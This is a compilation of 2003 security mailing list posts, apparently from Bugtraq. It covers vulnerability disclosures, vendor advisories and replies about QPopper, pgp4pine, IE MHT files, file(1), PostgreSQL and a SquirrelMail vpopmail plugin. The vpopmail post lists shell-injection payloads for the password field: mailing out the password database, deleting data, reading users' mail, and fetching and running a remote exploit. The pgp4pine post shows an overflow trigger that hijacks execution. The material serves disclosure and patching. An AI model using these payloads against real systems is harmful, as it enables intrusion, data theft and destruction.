Re: .MHT Buffer Overflow in Internet Explorer

[Thor Larholm]

 From: jelmer [EMAIL PROTECTED]
 I believe from ie6 SP1 on IE doesn't open any mht files directly from the
 web anymore.
 from the local filesystem it still works though.

That's the funny thing, IE6 SP1 still allows opening MHT files directly from
the web in the Internet Zone, so this is remotely exploitable on websites.

Since MHT files are opened automatically, just like certain other media
files, you can also open an MHT file automatically through an email message
in the Restricted Zone.


Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

Re: [Summary of Responses] Bound by Tradition: A sampling of the security posture of the Internet's DNS servers

[Mike Bell]

On Tue, Mar 11, 2003 at 08:30:17AM -0800, Mike Schiffman wrote:
 12) It is a bit misleading to say djbdns has no security 
 vulnerabilities.  While it is true that the component programs that 
 make up djbdns have not had a known vulnerability, the design of djbdns 
 relies on external services (Bernstein recommends rsync over ssh, I 
 believe) to replicate data from the primary to secondaries.

By that logic a bug in vi is a bug in BIND, because you need an editor
to maintain zone files.

DJB may recommend rsync over ssh, but djbdns as distributed by DJB only
offers that as one potential way to get data from one computer to another,
you can use any means you see fit to do so.

Re: QPopper 4.0.x buffer overflow vulnerability

[Randall Gellens]

The first I heard of the problem was this morning.  Was any notice 
sent to [EMAIL PROTECTED] or [EMAIL PROTECTED] in 
advance of the posting here?  If so, please let me know the details 
so I can see what happened to the message.  If not, I'd like to know 
why.

A fixed Qpopper (version 4.0.5fc2) is available now at 
ftp://ftp.qualcomm.com/eudora/servers/unix/popper/beta/.  I plan on 
releasing 4.0.5 final tomorrow unless I hear of any problems with 
4.0.5fc2.

--
Randall Gellens
[EMAIL PROTECTED]
Opinions are personal; facts are suspect; I speak for myself only

pgp4pine stack overflow vulnerability

[Eric AUGE]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Following informations:

I Background:
  pgp4pine is a mail encryption/decryption/signature/verification wrapper
  to gpg for pine, it is called from pine to parse mail body and get PGP
  information from the file.

  more information : http://pgp4pine.flatline.de/

II Problem description:
  When installed/configured within pine, pgp4pine parse any incoming mail
  before reading (in the default standard configuration) looking for
  PGP tokens  informations to do his sender's signature verifications.
  To verify incoming mail it calls :
  menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
  and read each line according to this loop :

 [...]
 char readline[CONSOLE_IO_LINE_LENGTH];
 (where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
 [...]
 do {
   fertig=0;
   while (!fertig)
   {
 if ((c=getc(fin))==EOF)
 {
   outFile=inFile; /* this usually is not
  executed, EOF breaks directly */
   return;
 }
 else if ((readline[i++]=c) == '\n')
 {
   readline[i]='\0';
   fertig=1;
 }
   }
   fertig=0;

   if (strncmp(-BEGIN PGP SIGNED,readline,20)==0)
   {
 /* got signed message */
 fclose(fin);
 while (fileVerify(inFile,outFile)  0); /* =1: Repeat */
 fertig=1;
   }
   else if (strncmp(-BEGIN PGP,readline,14)==0)
   {
 /* got another type of PGP message (encrypted, keys ...) */
 fclose(fin);
 fileDecrypt(inFile,outFile);
 waitForReturn();
 fertig=1;
   }
   else
 i=0; /* Got waste line, reset i */
 } while (!fertig);
 [...]

If a single line go over 256 chars directly to EOF,
it will overwrite saved environnement on the stack and return,
since there is no check on the index 'i' within the readline[] array,

 [...]
 }
 else if ((readline[i++]=c) == '\n')
 {
 [...]

you can can go over CONSOLE_IO_LINE_LENGTH and replace necessary
saved registers before hiting one condition to return.

 [...]
 if ((c=getc(fin))==EOF)
 {
   outFile=inFile; /* this usually is not
  executed, EOF breaks directly */
   return;
 }
 [...]

then try:

[EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ echo `perl -e 'print Ax500'`  testmail
[EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
[EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb)

Here it is ;)

III Impact
  Since pgp4pine process any incoming email, sending special crafted email
  can make sender execute arbitrary code on the recipient box when the
  mail is opened.

IV Workaround/Solutions

  Deactivate pgp4pine and use another pgp wrapper for pine :
  http://pgpenvelope.sourceforge.net/
  http://www.megaloman.com/~hany/software/pinepgp/stable.html
  or any other...

  author [EMAIL PROTECTED] has been contacted since 01/2003
  no reply since :/

V Proof of concept
  Attached proof of concept code, for any informations read the source.

Best Regards,

- ---
Eric AUGE.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (FreeBSD)

iD8DBQE+b1fGL/U5psk9l1gRAr1RAJ4pnFriwS073R3fEcGp+1nMF4Q58gCfdLAK
3aY03iuZQPfonSiyaqa5/Co=
=zirR
-END PGP SIGNATURE-

/* 
 *  mailex-gen.c -- PGP4Pine exploit mail generator - proof of concept 
 *  Copyright (C) 2003 - Eric AUGE
 *  
 *   This program is free software; you can redistribute it and/or
 *   modify it under the terms of the GNU General Public License
 *   as published by the Free Software Foundation; either version 2 of
 *   the License or (at your option) any later version.
 *
 *   This program is distributed in the hope that it will be
 *   useful, but WITHOUT ANY WARRANTY; without even the implied
 *   warranty
 *   of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *   GNU General Public License for more details.
 *
 *   You should have received a copy of the GNU General Public
 *   License
 *   along with this program; if not, write to the Free Software
 *   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
 *   02111-1307
 *   USA
 *
 * how poc code works : 
 *   $ cp /bin/sh /tmp/sh
 *   $ ls -l /tmp/sh
 *   -rwxr-x---1 rivalusers  680304 Mar 12 15:17 /tmp/sh
 *   $ ./mailex-gen
 *   eip (i use readline[] addr): 0xbfffdbd0
 *   now type: /path/to/pgp4pine-vuln -d -i ./mailme
 *   $ /path/to/pgp4pine-vuln -d -i ./mailme
 *   $ ls -l /tmp/sh
 *   -rwsr-xr-x1 rivalusers  680304 Mar 12 15:17 /tmp/sh
 *
 *
 *   Eric AUGE [EMAIL PROTECTED]
 *
 */

/* 
 * NOTE: EIP is hardcoded regarding my own system and tests,
 *   tune it for your needs ;)
 */

#include stdio.h

[sorcerer-spells] MAN-SORCERER2003-03-11

[Michael Walton]

-- 
Michael Walton

Asst-Manager Tech Support
[EMAIL PROTECTED]

(915)677-7900

Sorcerer Update Advisory
  Tap Into the Source




Source Name:man-1.51
Advisory ID:SORCERER2003-03-06-1
Date:   March 11th, 2003


Problem Description:
Fixes a bug which results in arbitrary code execution. 

Update:
Sources have been updated to the lates version.


Updated Sources:  man-1.51




Recomendation:
augur synch  augur update





Contacts:

Email:  [EMAIL PROTECTED]   
Mail List:  https://lists.berlios.de/mailman/listinfo/sorcerer-spells
Web:http://sorcerer.wox.org
Irc:irc://irc.freenode.net #sorcerer

Re: QPopper 4.0.x buffer overflow vulnerability

[Jaroslaw Zachwieja]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On pon 10. marca 2003 14:31, Florian Heinz wrote:

 http://nstx.dereference.de/snippets/qex.c
 Feedback is welcome.

Enforcing TLS/SSL is a temprorary workaround against script-kiddies - 
exploit (out-of-the-box) will not be able to authenticate.

(there is a user foobar, with passwd lalala on the system)

$ ./qex rootbox foobar lalala
Phase 1: Seeking buffer size
Connecting to xxx.xxx.xxx.xxx... Logging in... Could not log in. Did you 
provide a valid username/password-combination?
Exiting due to error...

that's becouse:

$ telnet 0 110
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
+OK ready
user foobar
- -ERR [AUTH] You must use TLS/SSL or stronger authentication such as APOP to 
connect to this server
quit

Not a fix, but who sends plaintext passwords anyway :) Unfortunately, I 
must assume, that at some point some friendly soul will equip qex with 
TLS/SSL.

What is the vendor response on that?
- -- 
grok

GPG public key at http://www.keyserver.net
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+bzP3ANulANzEW40RArDsAJ43VBZhYJXdhWsyGXT59LfwbJkH8wCgs+FW
8g4LLzXZ/D71rkaVjDRBR0c=
=CVSC
-END PGP SIGNATURE-

NetBSD Security Advisory 2003-003 Buffer Overflow in file(1)

[NetBSD Security Officer]

-BEGIN PGP SIGNED MESSAGE-


 NetBSD Security Advisory 2003-003
 =

Topic:  Buffer Overflow in file(1)

Version:NetBSD-current: source prior to February 27, 2003
NetBSD 1.6: affected
NetBSD-1.5.3:   affected
NetBSD-1.5.2:   affected
NetBSD-1.5.1:   affected
NetBSD-1.5: affected

Severity:   Inducing a user to run file(1) could execute code as the user

Fixed:  NetBSD-current: February 26, 2003
NetBSD-1.6 branch:  March 8, 2003 (1.6.1 includes the fix)
NetBSD-1.5 branch:  March 9, 2003 (1.5.4 includes the fix)


Abstract


If file(1) is run over a specially constructed ELF file, an exploitable
stack overflow occurs and attackers can gain the privileges of the user
running file(1).


Technical Details
=

A buffer overflow has been found in the file(1) program. If a user
were to run file(1) over a specially doctored ELF file, arbitrary code
would be executed as a result. Thus, if an attacker can somehow induce
a user to run file(1) over a file the attacker controls, the attacker
may gain any system privileges the victim possesses.

See iDEFENSE Security Advisory 03.04.03
http://www.idefense.com/advisory/03.04.03.txt


Solutions and Workarounds
=

The following instructions describe how to upgrade your file(1)
binaries by updating your source tree and rebuilding and
installing a new version of file(1).

* NetBSD-current:

Systems running NetBSD-current dated from before 2003-02-27
should be upgraded to NetBSD-current dated 2003-02-27 or later.

The following files need to be updated from the netbsd-current
CVS branch (aka HEAD) to the respective revisions:
src/usr.bin/file/readelf.c: 1.17
src/usr.bin/file/softmagic.c:   1.31

To update from CVS, re-build, and re-install file:
# cd src
# cvs update -d -A -P usr.bin/file
# cd usr.bin/file

# make cleandir dependall
# make install


* NetBSD 1.6:

The binary distribution of NetBSD 1.6 is vulnerable.

Systems running NetBSD 1.6 sources dated from before
2003-03-09 should be upgraded from NetBSD 1.6 sources dated
2003-03-09 or later.

NetBSD 1.6.1 will include the fix.

The following files need to be updated from the netbsd-1-6
CVS branch to the respective revisions:
src/usr.bin/file/readelf.c: 1.13.2.1
src/usr.bin/file/softmagic.c:   1.26.2.1

To update from CVS, re-build, and re-install file:
# cd src
# cvs update -d -r netbsd-1-6 -P usr.bin/file
# cd usr.bin/file

# make cleandir dependall
# make install


* NetBSD 1.5, 1.5.1, 1.5.2, 1.5.3:

The binary distribution of NetBSD 1.5.3 is vulnerable.

Systems running NetBSD 1.5, 1.5.1, 1.5.2, or 1.5.3 sources dated
from before 2003-03-10 should be upgraded from NetBSD 1.5.*
sources dated 2003-03-10 or later.

The following files need to be updated from the netbsd-1-5
CVS branch to the respective revisions:
src/usr.bin/file/readelf.c: 1.6.4.3
src/usr.bin/file/softmagic.c:   1.18.4.2

To update from CVS, re-build, and re-install file:
# cd src
# cvs update -d -r netbsd-1-5 -P usr.bin/file
# cd usr.bin/file

# make cleandir dependall
# make install


Thanks To
=

Lubomir Sedlacik and Antti Kantee, for drawing our attention to the
problem.

Christos Zoulas, for aiding in the solution and with this advisory.


Revision History


2003-03-12  Initial release


More Information


Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at 
  ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-003.txt.asc

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.


Copyright 2003, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2003-003.txt,v 1.7 2003/03/12 03:51:31 david Exp $

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (NetBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBPm9Mmz5Ru2/4N2IFAQEi1gQAkTTyWWzv+w4E+A+K0cpiAtmqoDv9l7B6
WmIy/o9U5/uvvI1JpOK3/QKI/QKsXQ1OC2/yK63nTv3rwb+m5olywGkE7DY4ObQk
9SnBe+lsVQbjTEM/lBCMwy86h9xTmiP4xrtF8Mw/rGN0HLOwHUIxkvOn+zYWH1jd
gS5Tn2BNd2c=
=urmE
-END PGP SIGNATURE-

VPOPMail Account Administration (squirrel mail) version 0.9.7

[error]

Plugin info: http://www.squirrelmail.org/plugin_view.php?id=103

Description:

VPOPMail Account Administration
The plugin lets the user do the tasks he would be able using qmailadmin

change password
let mails forward
create away messages

Notes (from the README):

* IMPORTANT 
For the plugin to work correctly, the Web-Server needs to run as
same user
as vpopmail does (most common: user vpopmail)
this is because the plugin needs write-permissions to the users
Maildir to
- create appropriate .qmail-files
- create away - messages


Comments (from myself):

This (allowing anything to be excuted as the web user) of course is a
huge security hole. This actually goes beyond that and says to run the
web server as vpopmail!

Amazing!
These people are far too trusting of their users.

Bad idea.

What could be worse?

How about making it even easier to exploit every vpopmail binary?

How?

Unclean input parsing!

If the vpopmail user is the same as the webuser you get to have fun
with:

vaddaliasdomain  vconvert vdominfo vpasswd
vadddomain   vdeldomain   vipmap   vpopbull
vadduser vdelivermail vkillvqmaillocal
valias   vdeloldusers vmkpasswdvsetuserquota
vchkpw   vdeluser vmoduser vuserinfo

Basically the exploits are unlimited (as you get full access rights to
vpopmail):

#change password
password;~vpopmail/bin/vpasswd [EMAIL PROTECTED] password

#mail password database
password;cat ~vpopmail/domains/example.com/vpasswd|mail -s owned
[EMAIL PROTECTED]

#remove vpopmail
password;rm -rf ~vpopmail/

#get listings of mail
password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail
[EMAIL PROTECTED]

#read any users mail
passwd;cat
~vpopmail/domains/example.com/user/Maildir/new//1027359339.48628.example.com\,S\=2432 
| mail [EMAIL PROTECTED]

#execute other arbatrary code on server
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;

Here is the offending code (line 45 in vpopmail.php):

system($vpasswd $username $pwd);

As we can see, this is very bad.

Very bad security model (running your webserver as vpopmail) backed up by sloppy 
coding (passing user entered data into the shell unescaped) == bad bad bad.

So you just pass anything I wrote above (or really anything at all that
you desire) and you own the systems vpopmail config.

Enter this data into the password changing field (make sure it matches
up in both) in the squirrel mail vpopmail password section to exploit.

But it's just a plugin to a webmail system, so no big deal ;-)

-- 
error [EMAIL PROTECTED]


signature.asc
Description: This is a digitally signed message part

Re: QPopper 4.0.x buffer overflow vulnerability

[Florian Heinz]

On Tue, Mar 11, 2003 at 07:05:51PM -0800, Randall Gellens wrote:
 The first I heard of the problem was this morning.  Was any notice 
 sent to [EMAIL PROTECTED] or [EMAIL PROTECTED] in 
 advance of the posting here?  If so, please let me know the details 
 so I can see what happened to the message.  If not, I'd like to know 
 why.

The cause for this bug is already identified and the fix is really
simple, I didn't see a reason to delay the post. It wasn't my intention
to cause you trouble, if I did so, I'm sorry. I had bad experience
informing vendors in the past, so I skipped that in this case.
For example, some time ago I reported the (non-exploitable) bug in
pop_msg.c, line 254f.:
free(local_element.mdef_macro); /* From strdup */
return pop_msg(p, POP_SUCCESS, HERE, Macro \%s\ accepted,
   local_element.mdef_macro);
and I didn't get a reply. Perhaps you want to fix this flaw too, in fc2.

regards,

Florian Heinz

@(#)Mordred Labs advisory - Remote DoS in PostgreSQL = 7.2.2

[sir . mordred]

-BEGIN PGP SIGNED MESSAGE-

//@(#) Mordred Labs advisory 0x0007

Release date: August 26, 2002
Name: Remote DoS condition in PostgreSQL
Versions affected: = 7.2.2
Conditions: entry in a pg_hba.conf file that matches attacker's host.
Risk: average
Author: Sir Mordred (http://mslabs.iwebland.com)

I. Description:

PostgreSQL is an advanced object-relational database management system
that supports an extended subset of the SQL standard, including
transactions,
foreign keys, subqueries, triggers, user-defined types and functions.
Check http://www.postgresql.org for more information.


Upon connecting to a database, postmaster will fork a new process.
After that, a child process will call a
src/backend/postmaster/postmaster.c:DoBackend() routine,
which after processing a startup packet (see src/include/libpq/pqcomm.h),
will invoke a src/backend/libpq/auth.c:ClientAuthentication() routine to
perform client authentication.
If there is an entry in pg_hba.conf file, that matches an attacker's host,
an attacker could trigger
invocation of src/backend/libpq/auth.c:recv_and_check_password0(), which
fails to detect a DoS condition.

II. Details:
Consider this snip of code from src/backend/libpq/auth.c:

[snip]
static int recv_and_check_password0(Port *port) {
int32 len;
char *buf;

if (pq_getint(len, 4) == EOF)
return STATUS_EOF;
len -= 4;
buf = palloc(len); /* len is taken from a packet */
[snip]

Note, that the size of palloced memory is taken from the user's input.


III. How to reproduce:

It's clear from the advisory how to reproduce this.

IV. Solution

Disable network access for untrusted users.


-BEGIN PGP SIGNATURE-
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wmAEARECACAFAj5vXM4ZHHNpci5tb3JkcmVkQGh1c2htYWlsLmNvbQAKCRAOkXvN4BZr
fHUdAKCtv+xPETQZLluTxHWgfIIcbDprwwCgsOtI5Qjzf0P2EwCFtowTdD9HsC4=
=9INs
-END PGP SIGNATURE-




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliatel=427

Potential PGP signature verification problem?

[Avri Schneider]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello,

I have come across a possible problem in the way PGP handles
signature verification.
The problem lies in the fact that PGP will strip OLE objects inserted
in an e-mail and verify the message signature based only on the text,
not informing the user that objects were striped.
A WordPad document can be inserted in the e-mail as an OLE object,
having the same font style and size as the original message.
An attacker would take a signed message and insert such word document
anywhere in the message as an OLE object and when the recepient
checks the signature - the wordpad document is stripped and the
signature would be valid - The attack would only work if the
recepient does not use the pgp verified message text viewer dialog
box to read the message but uses it only to verify the validity of
the signature.

This was tested with pgp.com's PGP version 8.0, other versions may be
vulnerable as well.

I have experimented with older versions and they only worked in the
hash field of the PGP header which is stripped before the message is
verified and the same attack can be performed but text would only be
added at the beginning of the message.

Regards,
Avri Schneider
http://pgp.mit.edu 0x44F87D04

-BEGIN PGP SIGNATURE-
Version: PGP 8.0 - not licensed for commercial use: www.pgp.com

iQA/AwUBPm0AKGelhJFE+H0EEQIyxACg7HTH5UjaSGy5D3cobYx0h6io1lsAnRk1
cWnPtLBNw3G3XBkZuuUXPgIg
=fWay
-END PGP SIGNATURE-

MDKSA-2003:031 - Updated usermode packages remove insecure shutdown command

[Mandrake Linux Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



Mandrake Linux Security Update Advisory


Package name:   usermode
Advisory ID:MDKSA-2003:031
Date:   March 12th, 2003

Affected versions:  8.1, 8.2, 9.0, Corporate Server 2.1,
Multi Network Firewall 8.2


Problem Description:

 The /usr/bin/shutdown command that comes with the usermode package can
 be executed by local users to shutdown all running processes and drop
 into a root shell.  This command is not really needed to shutdown a
 system, so it has been removed and all users are encouraged to upgrade.
 Please note that the user must have local console access in order to
 obtain a root shell in this fashion.


References:


Updated Packages:
  
 Corporate Server 2.1:
 6b3efb01bca77c598bfed862df7a10fe  corporate/2.1/RPMS/usermode-1.55-8.1mdk.i586.rpm
 eda24e3cdb96a6171e5b6ed7e6b1da2b  
corporate/2.1/RPMS/usermode-consoleonly-1.55-8.1mdk.i586.rpm
 498c7c44ab984017a38662202ec7e61f  corporate/2.1/SRPMS/usermode-1.55-8.1mdk.src.rpm

 Mandrake Linux 8.1:
 d338123f2d65b6d5e37c3475cb658720  8.1/RPMS/usermode-1.42-8.1mdk.i586.rpm
 1f56c7f08d8c1cd5f984e150c0c7ab98  8.1/SRPMS/usermode-1.42-8.1mdk.src.rpm

 Mandrake Linux 8.1/IA64:
 f5d33ef9c30d28a9a01fc6e277b5b703  ia64/8.1/RPMS/usermode-1.42-8.1mdk.ia64.rpm
 1f56c7f08d8c1cd5f984e150c0c7ab98  ia64/8.1/SRPMS/usermode-1.42-8.1mdk.src.rpm

 Mandrake Linux 8.2:
 ab8e859ccce7f45022ba698742f70552  8.2/RPMS/usermode-1.44-4.1mdk.i586.rpm
 18693e77214c918ce8aadc405c9347c3  8.2/RPMS/usermode-consoleonly-1.44-4.1mdk.i586.rpm
 c75d3d564384692e412fb24ad885193c  8.2/SRPMS/usermode-1.44-4.1mdk.src.rpm

 Mandrake Linux 8.2/PPC:
 152e076d46e0eb5b37784005d0dfabcc  ppc/8.2/RPMS/usermode-1.44-4.1mdk.ppc.rpm
 228e12c9af55c32e814a9d712c10da53  
ppc/8.2/RPMS/usermode-consoleonly-1.44-4.1mdk.ppc.rpm
 c75d3d564384692e412fb24ad885193c  ppc/8.2/SRPMS/usermode-1.44-4.1mdk.src.rpm

 Mandrake Linux 9.0:
 6b3efb01bca77c598bfed862df7a10fe  9.0/RPMS/usermode-1.55-8.1mdk.i586.rpm
 eda24e3cdb96a6171e5b6ed7e6b1da2b  9.0/RPMS/usermode-consoleonly-1.55-8.1mdk.i586.rpm
 498c7c44ab984017a38662202ec7e61f  9.0/SRPMS/usermode-1.55-8.1mdk.src.rpm

 Multi Network Firewall 8.2:
 18693e77214c918ce8aadc405c9347c3  
mnf8.2/RPMS/usermode-consoleonly-1.44-4.1mdk.i586.rpm
 c75d3d564384692e412fb24ad885193c  mnf8.2/SRPMS/usermode-1.44-4.1mdk.src.rpm


Bug IDs fixed (see https://qa.mandrakesoft.com for more information):
  
  408 - vulnerability fixed in RedHat two years ago still in Mandrake 8.2


To upgrade automatically, use MandrakeUpdate.  The verification of md5
checksums and GPG signatures is performed automatically for you.

If you want to upgrade manually, download the updated package from one
of our FTP server mirrors and upgrade with rpm -Fvh *.rpm.  A list of
FTP mirrors can be obtained from:

  http://www.mandrakesecure.net/en/ftp.php

Please verify the update prior to upgrading to ensure the integrity of
the downloaded package.  You can do this with the command:

  rpm --checksig filename

All packages are signed by MandrakeSoft for security.  You can obtain
the GPG public key of the Mandrake Linux Security Team from:

  https://www.mandrakesecure.net/RPM-GPG-KEYS

Please be aware that sometimes it takes the mirrors a few hours to
update.

You can view other update advisories for Mandrake Linux at:

  http://www.mandrakesecure.net/en/advisories/

MandrakeSoft has several security-related mailing list services that
anyone can subscribe to.  Information on these lists can be obtained by
visiting:

  http://www.mandrakesecure.net/en/mlist.php

If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

Type Bits/KeyID Date   User ID
pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  security linux-mandrake.com

- -BEGIN PGP PUBLIC KEY BLOCK-
Version: GnuPG v1.0.7 (GNU/Linux)

mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday
L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7
WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo
P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl
hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx
PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg
2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs
iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD